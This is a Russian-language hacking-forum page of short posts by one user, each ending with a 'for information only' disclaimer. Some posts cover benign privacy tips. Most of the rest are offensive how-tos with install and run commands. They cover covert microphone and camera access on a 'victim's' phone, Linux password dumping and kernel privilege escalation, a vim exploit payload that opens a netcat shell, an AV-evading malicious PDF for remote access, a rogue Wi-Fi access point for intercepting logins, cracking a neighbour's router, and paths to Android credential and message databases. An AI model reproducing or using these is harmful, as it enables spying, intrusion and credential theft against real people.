Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
Search the Community
Showing results for tags 'эксплойт'.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете читать удаленные сообщения в мессенджерах и социальных сетях на Android. С повсеместным введением фичи «Удалить сообщение для всех» жизнь перестала быть похожей на остроэмоциональный сюжет фильма. Представьте: молодой парень, тайно влюблённый в одногруппницу, наконец решается и пишет сообщение с признаниями. Проходит полчаса, и... «Удалить». Передумал! Может быть, это правильное решение, — сначала подумай, потом сделай, — но безрассудные поступки отличают нас от роботов. И кладут начало запоминающимся историям! NotiSave — это программа, которая группирует уведомления по приложениям и даёт возможность сохранять нужные. Всё просто: настраиваем утилиту так, чтобы она «курировала» соцсети и месседжеры → уведомления о новых сообщениях попадают в вечный архив. Удалил адресант message или нет, — не суть важно. Уведомление сохраняется! Рыба на крючке! Поэтому если хотите сохранять все переписки и для вас это действительно важно, то пользуйтесь данным сервисом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете засорять логи своему провайдеру. logspamer - скрипт, который заходит на разного рода сайты, прописанных в коде, засоряя логи. Установка: apt update apt upgrade apt install git -y apt install python -y pip install requests git clone https: // github. com/TermuxGuide/logspamer cd logspamer pip install -r requirements .txt Запуск: python logspamer .py --config config .json Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете посмотреть карту всех ваших перемещений по миру. Известный факт: Google следит за вашим местоположением и знает все места, где вы были. Скорее всего, вы используете сервисы Google много лет и за это время компания собрала огромную базу ваших передвижений. Энтузиасты придумали сервис Location History Visualiser — в него можно загрузить эти данные из истории местоположений и увидеть тепловую карту всех ваших перемещений. На ней видны все улочки, которые вы посещали при включённой передаче геолокации Google. Инструкция: переходим в Google Takeout, выбираем только пункт «История местоположений» и нажимаем «Создать экспорт». Так вы скачаете копию хронологии передвижений. После этого распаковываем данные и загружаем файл «LocationHistory.json» на сайт. Готово! Он визуализирует данные в красивую карту ваших перемещений по миру. Всё работает прямо на вашем устройстве и сервис не получает ваши файлы. Поэтому пользуйтесь, если вам интересно узнать эту информацию или возможно вы можете использовать эту информацию в каких-то интересных целях. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно прослушивать микрофон или камеру с помощью Termux. Для тех кто не в теме, Saycheese и Sayhello удалили с github, а нормальных аналогов до сих пор нет, поэтому прилагаю для Вас актуальную утилиту. E-TOOL — скрипт на основе bash, который можно использовать для получения доступа к микрофону, а так же фотографий с телефона жертвы. Установка: $ pip install lolcat $ git clone https://github.com/Expert-Hacker/E-TOOL.git $ cd E-TOOL $ bash setup.sh Использование: $ bash main_script.sh Выбираем нужный пункт. Но есть один большой недостаток: ссылку вам не выдадут, поэтому нужно установить ssh и запустить все на порте 3333. Установка ssh: $ apt install ssh -y Метод: $ ssh -R 3333:localhost:порт локалхоста nokey@localhost.run К примеру, прописываем $ ssh -R 3333:localhost:8080 nokey@localhost.run, после чего получаем ссылку в терминал. Для сохранения файла переходим в папку voice/camera, и пишем следующее: $ termux-setup-storage $ cp -r название файла.формат /sdcard/ Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Подборка mesh мессенджеров!
roguevad posted a topic in A section for resolving controversial issues.
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о подборке актуальных mesh-мессенджеров. Mesh-сеть — это распределенная, одноранговая, ячеистая сеть, где каждый узел обладает равными правами. О преимуществах и недостатках mesh-сетей подробно можно почитать здесь. Основным недостатком является сложность запуска и необходимость в огромном количестве участников. Преимуществ у таких видов сетей много, но ключевым является полная независимость вас от провайдера или власти, ведь вас невозможно отключить, расторгнуть с вами договор или прослушивать ваш трафик. И это прекрасно. dIM Chat — использует BT для связи, разумеется с шифрованием. Идентификация по QR коду. Для пользователей iOS. Fireside — использует Wi-Fi для связи, работает по протоколу NewNode. Есть для Android и iOS. Rumble — платформа для микроблогинга с возможностью общения (текст и фото). Использует для связи Wi-Fi и BT. berty — анонимный р2р мессенджер, работающий без интернета и сотовой связи. Не требует ничего для регистрации. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации. -
Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget //raw.githubusercontent.com/shawnduong/PXEnum/master/PXEnume.sh Установка: # git clone //github.com/shawnduong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone //github.com/NullArray/Bash-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone //github.com/huntergregal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone //github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-day или устаревший софт.
-
Приветствую, хакеры! Многим известно, что запускать неизвестного происхождения файлы небезопасно, но сколько человек при этом открывает незнакомые текстовые файлы, например, в текстовом редакторе? Особенно если это Linux и какой-нибудь проверенным временем текстовый редактор vim/emacs! Что может случиться? Краткое описание недавней уязвимости в vim Не хочу вдаваться в технические подробности дырки, которую нашли в текстовом редакторе vim, об этом написано немало статей (уязвимости присвоен номер CVE-2019-12735), но хочу рассказать о том, какую опасность это несёт и почему надо быть предельно аккуратным даже с такими, казалось бы, базовыми инструментами. Вектор атаки: вам присылают файлик, вы его открываете в vim, а тем временем у вас на компьютере выполняется код. Например, качается с удаленного сервера бекдор и устанавливается в систему. Причем вы даже не видите целиком содержимого файла, вся выполняемая конструкция замаскирована и не отображается. Демонстрация экслоита Рассмотрим один из экслоитов для vim. $ wget https://raw.githubusercontent.com/numirias/security/master/data/2019-06-04_ace-vim-neovim/shell.txt А теперь попробуем его прочитать, например, утилитой cat: $ cat shell.txt Nothing here. А вот что в файлике находится на самом деле: $ cat -v shell.txt [?7l SNothing here. :silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: [1G [KNothing here." [D То есть вы качаете незнакомый файлик, открываете его в уязвимом текстовом редакторе и у вас открывается шелл на 9999-порту и делай дальше с вашей машиной что хочешь. Вывод Открытие незнакомых текстовых файлов даже в текстовых редакторах может быть опасным. Если вы не доверяете источнику, с которого скачен файл, лучше запустить его в изолированном окружении вроде виртуальной машины, или тестовой vps. Как вариант — добавьте в ваш шелл (например, ~/.zshrc) следующий alias, чтобы хоть как-то обнаружить возможную маскировку шелл-кода в незнакомом файле. При условии что это не эксплоит к утилите cat, или терминалу. alias cv='cat -v' Ну и конечно же не забывайте обновлять всё ПО и ОС на всех ваших девайсах. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно зашифровать файлы прямо в браузере. Шифрование файла паролем — очень полезная вещь, когда нужно отправить важный документ по электронной почте или сохранить его в Google Drive. Если файл не зашифрован, его посмотрит любой злоумышленник. Надёжное шифрование же превращает документ в сложный код, который не расшифровать постороннему. Есть проблема: большинство онлайн-сервисов сохраняют ваши файлы себе на сервер. Редкое исключение — Hat.sh. Он шифрует данные прямо в браузере, не отправляя их себе на сервер. Код лежит в открытом доступе. Вы можете сами убедиться в этом. Пользоваться инструментом очень просто: выбираем шифруемый файл, вводим или генерируем ключ шифрования и нажимаем Encrypt для шифрования и Decrypt для дешифрования. С помощью данного инструмента вы можете легко шифровать всевозможные файлы прямо в браузере. Больше вам нет необходимости отвлекаться от своего дела, вы можете все сделать на месте и продолжать свои дела. Не нужно устанавливать другие инструменты, чтобы заниматься сохранностью данных. Поэтому если вам необходимо шифрование данных, но вы очень много работаете в браузере, то это решение для вас. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно удалить все аккаунты в социальных сетях за пару минут. UX-дизайн соцсетей и популярных сервисов специально устроен так, чтобы вы не удаляли аккаунт. Поэтому кнопка удаления глубоко спрятана в интерфейсе — её тяжело найти. Но если у вас экстренная ситуация или просто лень искать — есть лайфхак, как это обойти JustDelete - На этом сайте есть либо прямые ссылки на удаление аккаунта, либо понятная инструкция, как это быстрее всего сделать. В выдаче — все соцсети, мессенджеры, популярные сервисы и ПО. От Facebook, WhatsApp и ВКонтакте — до Bitly и ChangeOrg. Но есть нюанс: не все аккаунты можно удалить с помощью пары кликов. Для этого в JustDelete рядом с названием каждого сервиса есть плашка. Если «Easy» — аккаунт легко удалить. «Medium» — нужны дополнительные действия/часть информации о вас останется на серверах. «Hard» — свяжитесь с техподдержкой для удаления. И статус «Impossible» — невозможно удалить аккаунт. Очень полезный сервис, пользуйтесь! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу расскзать вам о том, как вы можете разблокировать скрытые функции Вконтакте. Одна из крупнейших социальных сетей «Вконтакте» была появилась в далеком 2006 году. И хотя за этот период были устранены многие критичные недостатки, пользователям все равно приходится терпеть множество мелких недоработок: неудобное перелистывание картинок, скучный фон или всем известный запрет на скачивание аудиозаписей. VkOpt — многофункциональное расширение для ВКонтакте, которое изначально предназначалось для скачивания музыки и видеозаписей, но со временем значительно расширило свой функционал. Плагин поддерживается всеми современными браузерами, включая и мобильные версии. Полный список возможностей указан внизу страницы загрузки, однако можно выделить несколько интересных особенностей: изменение оформления страницы, замена звуков уведомлений, отображение возраста пользователя, проверка удалившихся друзей, массовая очистка сообщений, стены или аудиозаписей. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как создать точку доступа для перехвата данных. Зачастую люди не хотят заботиться о безопасности своих данных, и подключаясь к открытому Wi-Fi сильно рискуют отдать свои данные в руки злоумышленника. Сейчас будет рассмотрен способ создания файловой точки доступа для подобного перехвата. Установка: git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git cd WiFi-Pumpkin chmod +x installer.sh sudo ./installer.sh --install wifi-pumpkin Будет запущен графический интерфейс, зайдите в раздел "Seetings" и дайте название вашей точке доступа, затем перейдите в "Activity Monitor Settings" и поставьте галочки на пунктах "HTTP-Requests", "HTTP-Authentication" и "Pumpkin Proxy". С помощью данной небольшой программы вы можете легко перехватывать данные из сети. Поэтому если вы хотите потренироваться в этом или найти методы защиты от подобных перехватов, то советую попробовать использовать данную программу по своему назначению. Вполне возможно, что она вам пригодится. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Сегодня я покажу вам, как можно взломать ПК при помощи PDF-файла. Так как данный формат имеет множество уязвимостей, в него легко можно "вшивать" различное вредоносное программное обеспечение. В этой статье мы будем применять автоматизированный фреймворк Insanity Framework, который позволяет создать зараженный PDF-файл, позволяющий реализовать удаленный доступ к ПК под управлением систем Windows. За дело! В качестве машины-жертвы у нас будет ПК под управление WIndowsВ качестве атакующего хоста будет выступать Kali LinuxВектор атаки будет направлен на Adobe Reader, а точнее создание вредоносного файла в формате PDF, запуск которого и позволит получить сессию на удаленном компьютере. Итак, Insanity Framework – это фреймворк, который, значительно облегчает создание полезной нагрузки, ее маскировку и запуск на атакуемом хосте. Значительный плюс, это возможность обхода большинства антивирусных решений. Особенности: · Обход большинства AV и Sandboxes · Удаленный контроль · Генерация полезных нагрузок · Некоторые методы фишинга включены в полезные нагрузки · Обнаружение виртуальных машин · Закрепление в системе и другие особенности Начнем с установки фреймворка: git clone https://github.com/4w4k3/Insanity-Framework cd Insanity-Framework ls –a chmod +x insanity.py Затем запустим программу: ./insanity.py Далее следует процесс обновления: Следующий этап, это процесс установки необходимых программ: И настройка зависимостей: Рабочее меню приложения выглядит следующим образом: Начнем процесс создания полезной нагрузки: Следующим шагом будет создание PDF файла: В итоге, мы получаем информацию о том, куда сохранен файл и предложение запустить listener: Запустим listener и перенесем сгенерированный файл на удаленный хост: Через некоторое время открывается сессия командной строки. Процессы, порожденные, запуском файла выглядят, таким образом: Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Атака ZIP-plaintext использует известный фрагмент архива того же файла, что есть в архиве, но на который не наложена защита паролем. То есть смотрите, как это выглядит. Мы нашли ZIP-архив, на который установлен пароль. Но при этом видим список файлов в этом архиве. Вот так это выглядит: Звёздочки у имён файлов означают, что доступ к файлам защищён паролем. Теперь внимание! Есть смысл поискать эти файлы по именам на диске! Банально ищем все файлы по именам и найденные файлы проверяем программкой типа hashmyfiles.exe (из пакета Nirsoft) на предмет совпадения контрольных сумм CRC32. Обратите внимания, я нашёл тот файл, который был запакован! Быть может нам удастся найти все файлы таким образом. Возможно нужно привлечь восстановление удалённой информации (R-Studio в помощь!). Предположим также, что другие файлы мы не нашли, но очень интересно их содержание. Тогда мы… запаковываем найденный файл в ZIP-архив без пароля и используем его в качестве “известного” фрагмента. Оба архива “скармливаем” программе Passware Password Recovery Kit Forensic. Выбираем первый пункт – Recover File Password. Откроется диалоговое окно открытия файла. Там выберем наш зашифрованный архив. Выберем продвинутые опции [2] “Advanced: Customize Settings“. Выбираем в разделе “Special Attacks” – “ZIP Plaintext“, выбираем наш архив без пароля с одним из найденных файлов и нажимаем кнопку Recover >>. Осталось дождаться. Мой архив вскрылся где-то за три с половиной минуты: Причём как вскрылся. Мы не получили пароль в открытом виде, мы получили архив со снятым паролем! Важное замечание: Чем меньше по размеру файлы и архивы, тем, соответственно, быстрее пройдёт атака. Всяко лучше и быстрее, чем ломать прямым перебором! Тем более, что прямым перебором сломать пароль вида “mas12345ter” из 11 символов двух раскладок не так уж и просто, если не знать подробностей создания пароля. Ну и теперь о защите непосредственно. Хочу сказать, что эту атаку было бы провести куда невозможнее, если бы мы поставили галочку “шифровать имена файлов“, тогда бы не увидели имена и контрольные суммы файлов, чтобы подобрать участки plaintext. Кроме того, в ZIP-архивах можно применять другой вид шифрования – AES-256, что также делает данную атаку невозможной. Зашифровать таким способом можно при помощи архиватора 7Zip. Тогда тип атаки даже не будет предложен в программе “Passware…” Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной статье собраны несколько секретных Android-папок, которые могут вам пригодиться. Контакты пользователя: /data/data/com.android.providers.contacts/databases/contacts2.db Данные смс сообщений: /data/data/com.android.providers.telephony/databases/mmssms.db История звонков: /data/data/com.android.providers.contacts/contacts.db Журнал событий Android: /data/com.sec.android.provider.logsprovider/databases/logs.db История веб браузера: /data/data/com.android.browser/databases/browser2.db Истории браузера Chrome: /data/data/com.android.chrome/app_chrome/Default/Archived History /data/data/com.android.chrome/app_chrome/Default/History Логины и пароли водимые в браузере Chrome: /data/data/com.android.chrome/app_chrome/Default/Login Data Браузер Firefox. /data/data/org.mozilla.firefox/files/mozilla Сообщения Facebook: /data/data/com.facebook.katana/databases/threads_db2 /data/data/com.facebook.orca/databases/threads_db2 Контакты WhatsApp: /data/data/com.whatsapp/databases/wa.db Звонки WhatsApp: /data/data/com.whatsapp/databases/msgstore.db Сообщения WhatsApp: /data/data/com.whatsapp/databases/msgstore.db Сообщения и звонки для Skype: /data/data/com.skype.raider/files//main.db Viber хранит отдельно сообщения и звонки: /data/data/com.viber.voip/databases/viber_data Сообщения Viber: /data/data/com.viber.voip/databases/viber_messages Telegram: /data/data/org.telegram.messenger/files/cache4.db Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как сделать из iPhone подслушивающее устройство. Продукты Apple имеют немало скрытых и неочевидных функций: о некоторых вы, скорее всего, и не догадываетесь. Например, не все слышали про функцию «Live-прослушивание». «Live-прослушивание» позволяет слышать речь или беседу людей на расстоянии, с которого могут работать наушники. Они должны быть из серии AirPods или Beats, а на устройства iOS должна быть установлена версия ПО 14.3. или более поздняя. При функции «Live-прослушивание» iPhone выполняет роль микрофона, который передаёт звук в наушники. Сначала функцию требуется добавить в пункт управления: перейдите в «Настройки», затем в «Пункт управления», прокрутите вниз и нажмите кнопку «+» около кнопки «Слух». Затем откройте пункт управления. Подключите наушники, нажмите на значок «Слух» и затем «Live-прослушивание». Поместите телефон напротив собеседника, которого хотите услышать. При необходимости отрегулируйте уровень громкости. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Как создать собственный VPN
roguevad posted a topic in A section for resolving controversial issues.
Приветствую, хакеры! В данной статье хочу рассказать вам о том, как создать свой VPN. Все платные и бесплатные VPN-сервисы сохраняют вашу историю браузера и очень часто сливают эти данные. Пользуясь обычным VPN, вы всегда рискуете своей анонимностью. Самый эффективный способ защиты от утечек — создать VPN на собственном сервере. Outline Manager - даже без знаний программирования вы сделаете это за несколько минут с помощью этого сервиса. У проекта открыт исходный код и его создали в самом Google. Единственный нюанс: стоит $5 в месяц, но первые 2 месяца бесплатные. Это точно стоит сохранности вашей конфиденциальности. Простая инструкция: устанавливаем программу на ПК, создаём аккаунт и выбираем ближайшую к себе страну. Нажимаем на «Add Key» и отправляем себе ссылку для доступа к VPN. И это всё! На панели управления есть вся информация о том, сколько трафика использовано и сколько устройств пользуются вашим VPN. Посмотреть Вот таким простым способом можно создать свой собственный VPN сервис, который можно использовать в личных целях. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации. -
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как запретить доступ к сети любой программе на компьютере. При необходимости вы можете заблокировать доступ в интернет определенному ПО. Сделать это можно при помощи встроенных в систему функций. В решении данной задачи нам поможет брандмауэр Windows, который, по сути, является одним из самых простых способов заблокировать программе доступ к Интернету, не требующий установки каких-либо сторонних средств. Погнали! 1. Первым делом нажимаем "Win+R" и вводим команду "firewall.cpl" 2. Затем слева нажимаем "Дополнительные параметры", после чего переходим в "Правила для исходящего подключения" 3. Здесь в правой части нажимаем на "Создать правило", выбираем "Для программы", указываем путь, ставим галочку на "Блокировать подключение", затем "Далее", указываем "Имя" и нажимаем "Готово". Это отличный способ, чтобы запретить приложениями доступ в сеть. Это поможет значительно повысить безопасность вашего компьютера и сохранность ваших данных. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете защитить свою флешку от проникновения различных вредоносных программ. Когда мы вставляем USB накопитель в зараженный компьютер, вирус обнаруживает новое устройство и пытается записаться на него. При этом вирус создает на устройстве файл «autorun.inf». В этом файле прописан путь к телу вируса. Соответственно, если запретить вирусу запись в файл «autorun.inf», он не сможет заражать компьютеры. Реализовать подобную защиту позволяет программа «Autostop». Она имеет 3 функции: 1. Отключение автозапуска флешек и CD/DVD. 2. Защита от autorun-вирусов. 3. Программная защита от записи. Как пользоваться: 1. После запуска программы вводим цифру 1, 2 или 3, в зависимости от того, какой способ хотим применить. 2. Затем нажимаем клавишу «Enter», чтобы способ защиты вступил в силу. Рекомендую применять первый и второй. Вот такой простой и эффективный способ имеется, чтобы защитить свою флешку от вирусов, рекомендую каждому, кто часто пользуется USB-накопителями. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! HTTPS – это протокол передачи данных, задача которого обеспечить безопасность данных передаваемых между сайтом и пользователями. Необходим он для того, чтобы соединение между устройством пользователей (компьютер, ноутбук или планшет, телефон) и веб-сервисом было зашифровано вместе с переданными данными. Если зайти на страницу сайта по HTTP и пройти по пути от устройства пользователя до веб- сервера, то сетевые пакеты, которые передаются между пользователем и сервером, будут открыты. Можно их перехватывать и читать. Так что все логины и пароли можно прочесть. Однако при использовании протокола HTTP сетевые пакеты можно перехватить, но прочесть передаваемые ими данные, нельзя. HTTPS шифрует отправленные данные, которые можно расшифровать только особым закрытым ключом, хранящимся на серверном сервере. Передаваемые сообщения зашифровывают на стороне клиента открытым ключом, выдающимся веб-сервером пользователю, установившему соединение. Данные передаются от сервера к клиенту, и сервер шифрует сообщения открытым ключом клиента, который зашифровывает их закрытым ключом. Кроме того, в качестве примера можно привести использование пары ключей открытый-закрытый, которая для расшифровки сообщений текущей сессии известна только клиенту и серверу. HTTPS не является чем-то новым. И это обычный HTTP, который работает через шифрование отправляемых данных. В данном случае установка для сайта HTTPS сертификатов не означает, что сайт полностью защищен от других способов взлома через уязвимости в системе защиты. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Сегодня мы поговорим о том, как при наименьших усилиях получить наибольший результат, чем, в нашем случае, является бесплатный интернет. Для реализации нам понадобится программа Router Scan. 1. Сначала программа сама попробует подобрать пароль и логин под роутер соседа, но тут не всегда выходит желаемый результат. 2. Если же проге не удалось узнать пароль и логин, то тут нам поможет использование некоторых багов и слабостей каждого из вида роутеров, что позволит нам либо получить информацию, либо обойти стороной авторизацию. Сперва нам потребуется просканировать сети в радиусе действия. Для этого запускаем программу, она спросит, хотим ли мы отправлять полученные данные в общую базу данных, ну и попросит подтвердить пользовательское соглашение. 3. Теперь переходим в последнюю вкладку в программе и выставляем 2 галочки. Теперь следует подождать, пока программа определит WiFi сети. 4. Когда появится сеть, которую мы хотели взломать, жмём на ней ПКМ, потом "Obtain key with WPS" и в появившемся окне "Start Audit". 5. После этого начнётся процесс подбора логина и пароля. Просто ждём, когда программка добродушно предоставит нам нужные данные. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как в калькуляторе можно создать двойное дно. Существует такое приложение, которое при открытии будет выглядеть как обычный калькулятор, но если ввести на нем определенное число, откроется потайное хранилище, где можно спрятать фотографии, видео, заметки и даже пользоваться секретным браузером. Калькулятор Photo Vault (https://play.google.com/store/apps/details?id=com.hld.anzenbokusucal) - для Android или Calculator# (https://apps.apple.com/gb/app/calculator-hide-photos-videos/id1165276801) для iOS, и применений ему может быть много: от простой защиты личных фото от лишних глаз, до скрытия файлов, например при досмотре смартфона таможенниками. При первом запуске вас попросят установить пароль, после чего необходимо задать секретные вопросы и указать почту для восстановления данных в случае утери PIN-кода. В настройках вы также можете создавать резервные копии, изменять внешний вид калькулятора, менять метод шифрования и восстанавливать утерянные файлы. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Полезные сервисы для работы
roguevad posted a topic in A section for resolving controversial issues.
Приветствую, хакеры! При осуществлении какой-либо деятельности в инете, обычно мы используем множество инструментов для достижения цели: редакторы, почты и т.п. Порой их использование осуществляется крайне неудобным образом, когда за каждым инструментом нам приходится лезть в отдельные памятки, заметки или приложения. В данном посте мы поделимся с Вами несколькими сервисами первой необходимости, которые в значительной мере оптимизируют выполняемые Вами действия и позволят выполнять любую работу значительно быстрее. Помимо этого, некоторые из этих сервисов способны заменить ограниченные ресурсы, которые мы также используем в работе. Список: 1. Получаем одноразовые почты → https://temp-mail.org/ru/ 2. Получаем одноразовые номера → https://sms-activate.ru/ru/ 3. Генерируем фейк-аккаунты, переписки, личности → https://fakedetail.com/ 4. Онлайн-фотошоп → https://www.photopea.com/) 5. Создание простеньких сайтов для чайников → https://pory.io/ 6. Анализ поисковых запросов в Google → https://trends.google.com/trends/ 7. Трекер для поисковых запросов → https://www.google.ru/alerts Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации. -
Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете отключить гибернацию в Windows. Гибернация - энергосберегающее состояние компьютера, предназначенное в первую очередь для ноутбуков. В режиме гибернации данные о состоянии системы и программ сохраняются на системном жестком диске в скрытом файле «hiberfil.sys», после чего ноутбук выключается. Самый простой способ включения или отключения режима гибернации - использовать командную строку. Потребуется запустить ее от имени администратора: для этого кликните правой кнопкой мыши по кнопке «Пуск» и выберите соответствующий пункт. Чтобы отключить гибернацию, в командной строке выполните команду «powercfg -h off» и нажмите Enter. Это отключит данный режим, удалит файл «hiberfil.sys» с жесткого диска и отключит опцию быстрого запуска Windows 10, которая также задействует данную технологию и без гибернации не работает. Это самый быстрый и простой способ отключения гибернации, поэтому если вам это необходимо, то отключайте. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как моментально удалить все данные с телефона. Иногда данные на телефоне, — фотографии, номера, приложения, — нужно удалить быстро. Ситуации бывают разные: выбивают дверь сотрудники СОБР, принял решение покончить жизнь самоубийством, предлагают 1.000.000$ в обмен на смартфон и дают минуту на принятие решения. Но обычно все куда прозаичнее: телефон вот-вот перейдёт новому владельцу. И ему явно ни к чему знать все подробности твоей личной жизни... чтобы не было, как в фильме «Текст». Extirpater — Android-приложение, которое быстро стирает все данные с телефона. Без возможности восстановления! Механика необычная: сначала свободное на смартфоне место заполняется случайными файлами, а затем вся «коллекция» одним махом отправляется в бездонную корзину. Bye-bye! «А зачем вся эта суета? Есть ведь сброс до заводских настроек!» — скажешь ты. Есть! Вот только на полную гарантию удаления ВСЕХ данных при таком раскладе рассчитывать не приходится. В частности речь о фотографиях. Проверено! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
